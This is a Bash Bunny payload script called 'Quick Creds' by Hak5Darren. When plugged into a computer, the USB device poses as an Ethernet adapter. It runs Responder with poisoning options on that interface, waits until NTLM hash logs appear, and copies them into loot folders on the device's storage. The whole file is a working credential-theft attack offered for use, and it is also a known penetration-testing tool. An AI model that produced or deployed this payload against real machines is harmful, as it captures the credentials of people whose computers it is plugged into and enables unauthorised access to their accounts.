#!/bin/bash
#
# Title:         Quick Creds
# Author:        Hak5Darren -- Cred: Mubix
# Version:       1.0
# Firmware:      >= 1.1
#
# Runs responder against target with specified options
# Saves sequential logs to mass storage loot folder
#
# Requires responder in /tools/responder
#
# | Status              | Description                              |
# | ------------------- | ---------------------------------------- |
# | FAIL1               | Responder not found at /tools/responder  |
# | FAIL2               | Target did not aquire IP address         |
# All other LED statuses are standard to v1.1
# 
# Options
RESPONDER_OPTIONS="-w -r -d -P"
LOOTDIR=/root/udisk/loot/quickcreds

# Check for responder
REQUIRETOOL responder

# Setup Attack
LED SETUP

# Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET
ATTACKMODE RNDIS_ETHERNET 
#ATTACKMODE ECM_ETHERNET

# Set convenience variables
GET TARGET_HOSTNAME
GET TARGET_IP

# Setup named logs in loot directory
mkdir -p $LOOTDIR
HOST=${TARGET_HOSTNAME}
# If hostname is blank set it to "noname"
[[ -z "$HOST" ]] && HOST="noname"
COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
COUNT=$((COUNT+1))
mkdir -p $LOOTDIR/$HOST-$COUNT

# As a backup also copy logs to a loot directory in /root/loot/
mkdir -p /root/loot/quickcreds/$HOST-$COUNT

# Check target IP address. If unset, blink RED and end.
if [ -z "${TARGET_IP}" ]; then
    LED FAIL2
	exit 1
fi

# Set LED yellow, run attack
LED ATTACK
cd /tools/responder

# Clean logs directory
rm logs/*

# Run Responder with specified options
python Responder.py -I usb0 $RESPONDER_OPTIONS &

# Wait until NTLM log is found
until [ -f logs/*NTLM* ]
do
     # Ima just loop here until NTLM logs are found
	 sleep 1
done

# copy logs to loot directory
cp logs/* /root/loot/quickcreds/$HOST-$COUNT
cp logs/* $LOOTDIR/$HOST-$COUNT

# Sync USB disk filesystem
sync

# Light turns green - trap is clean.
LED FINISH